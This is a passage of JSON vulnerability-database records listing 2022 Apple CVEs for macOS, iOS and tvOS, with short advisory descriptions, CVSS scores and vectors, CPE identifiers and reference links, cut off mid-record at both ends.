"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-18T18:15:00", "type": "prion", "title": "CVE-2022-22650", "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22650"], "modified": "2022-11-02T13:18:00", "id": "PRION:CVE-2022-22650", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-22650", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-08-15T15:50:16", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "prion", "title": "CVE-2022-22614", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22614"], "modified": "2022-11-02T13:18:00", "id": "PRION:CVE-2022-22614", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-22614", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-15T15:50:32", "description": "A null pointer dereference was addressed with improved validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An attacker in a privileged position may be able to perform a denial of service attack.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-18T18:15:00", "type": "prion", "title": "CVE-2022-22638", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22638"], "modified": "2022-11-02T13:18:00", "id": "PRION:CVE-2022-22638", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-22638", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-08-15T15:51:01", "description": "A type confusion issue was addressed with improved state handling. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to execute arbitrary code with kernel privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "prion", "title": "CVE-2022-22661", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22661"], "modified": "2022-11-02T13:18:00", "id": "PRION:CVE-2022-22661", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-22661", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-15T15:50:44", "description": "This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to read restricted memory.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-18T18:15:00", "type": "prion", "title": "CVE-2022-22648", "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22648"], "modified": "2022-11-02T13:18:00", "id": "PRION:CVE-2022-22648", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-22648", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-08-15T15:50:16", "description": "A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to gain elevated privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "prion", "title": "CVE-2022-22617", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22617"], "modified": "2023-08-08T14:21:00", "id": "PRION:CVE-2022-22617", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-22617", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-15T15:50:15", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "prion", "title": "CVE-2022-22615", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22615"], "modified": "2022-11-02T13:18:00", "id": "PRION:CVE-2022-22615", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-22615", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-15T15:50:22", "description": "An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2022-03-18T18:15:00", "type": "prion", "title": "CVE-2022-22626", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22626"], "modified": "2022-11-02T13:18:00", "id": "PRION:CVE-2022-22626", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-22626", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2023-08-15T15:50:24", "description": "An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2022-03-18T18:15:00", "type": "prion", "title": "CVE-2022-22627", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22627"], "modified": "2023-08-08T14:21:00", "id": "PRION:CVE-2022-22627", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-22627", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2023-08-15T15:50:43", "description": "This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. A person with access to a Mac may be able to bypass Login Window.", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 4.6, "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-18T18:15:00", "type": "prion", "title": "CVE-2022-22647", "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22647"], "modified": "2022-11-02T13:18:00", "id": "PRION:CVE-2022-22647", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-22647", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-08-15T15:51:01", "description": "A cookie management issue was addressed with improved state management. This issue is fixed in Security Update 2022-003 Catalina, macOS Big Sur 11.6.5. Processing maliciously crafted web content may disclose sensitive user information.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-05-26T18:15:00", "type": "prion", "title": "CVE-2022-22662", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22662"], "modified": "2023-08-08T14:22:00", "id": "PRION:CVE-2022-22662", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-22662", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2023-06-14T14:23:46", "description": "A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks. This issue is fixed in Security Update 2022-003 Catalina, macOS Big Sur 11.6.5, macOS Monterey 12.3. A local user may be able to write arbitrary files.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-02-27T20:15:00", "type": "cve", "title": "CVE-2022-22582", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.7, "vectorString": "AV:L/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22582"], "modified": "2023-03-07T20:21:00", "cpe": ["cpe:/o:apple:mac_os_x:10.15.7"], "id": "CVE-2022-22582", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22582", "cvss": {"score": 1.7, "vector": "AV:L/AC:L/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-006:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:-:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-003:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-007:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-007:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-005:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-002:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-008:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-002:*:*:*:*:*:*"]}, {"lastseen": "2023-06-14T14:24:20", "description": "An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to gain elevated privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "cve", "title": "CVE-2022-22631", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22631"], "modified": "2022-11-02T13:18:00", "cpe": ["cpe:/o:apple:macos:10.15.7", "cpe:/o:apple:mac_os_x:10.15.7"], "id": "CVE-2022-22631", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22631", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-006:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-005:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-004:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-003:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-007:*:*:*:*:*:*", "cpe:2.3:o:apple:macos:10.15.7:-:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-002:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-008:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-001:*:*:*:*:*:*", "cpe:2.3:o:apple:macos:10.15.7:supplemental_update:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-002:*:*:*:*:*:*"]}, {"lastseen": "2023-08-11T23:20:05", "description": "This issue was addressed with improved checks. This issue is fixed in Security Update 2022-003 Catalina, macOS Monterey 12.3, macOS Big Sur 11.6.5. A maliciously crafted ZIP archive may bypass Gatekeeper checks.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-05-26T18:15:00", "type": "cve", "title": "CVE-2022-22616", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22616"], "modified": "2023-08-08T14:22:00", "cpe": ["cpe:/o:apple:mac_os_x:10.15.7"], "id": "CVE-2022-22616", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22616", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-002:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-008:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-006:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-002:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-007:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:-:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-007:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:supplemental_update:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-005:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-003:*:*:*:*:*:*"]}, {"lastseen": "2023-06-14T14:24:20", "description": "An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2022-03-18T18:15:00", "type": "cve", "title": "CVE-2022-22625", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22625"], "modified": "2022-11-02T13:18:00", "cpe": ["cpe:/o:apple:macos:10.15.7", "cpe:/o:apple:mac_os_x:10.15.7"], "id": "CVE-2022-22625", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22625", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-006:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-005:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-004:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-003:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-007:*:*:*:*:*:*", "cpe:2.3:o:apple:macos:10.15.7:-:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-002:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-008:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-001:*:*:*:*:*:*", "cpe:2.3:o:apple:macos:10.15.7:supplemental_update:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2022-002:*:*:*:*:*:*"]}, {"lastseen": "2023-06-14T14:24:42", "description": "A type confusion issue was addressed with improved state handling. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to execute arbitrary code with kernel privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": 